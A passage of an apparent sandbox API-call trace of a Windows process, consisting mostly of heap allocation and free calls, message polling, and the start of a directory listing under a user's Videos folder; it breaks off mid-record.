RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0100.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ba8 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0100.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0100.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0100.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0100.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0100.632] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0100.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0100.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0100.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0100.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0100.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0100.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0100.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0100.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0100.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0100.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0100.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0100.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0100.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0100.633] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0100.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0100.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0100.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0100.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca340 [0100.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4c) returned 0x436a608 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0100.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a030 [0100.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a030 | out: hHeap=0x1780000) returned 1 [0100.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0100.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0100.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0100.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0100.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0100.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0100.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0100.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8388 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0100.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0100.636] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.636] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.636] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0100.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0100.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.637] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0100.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0100.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0100.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0100.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.637] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.637] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0100.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0100.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0100.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0100.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.638] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0100.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0100.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0100.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0100.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.639] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0100.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0100.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a030 [0100.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0100.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0100.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.639] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbdaf4c0, ftCreationTime.dwHighDateTime=0x1d5f099, ftLastAccessTime.dwLowDateTime=0x81cb3cc, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x81cb3cc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 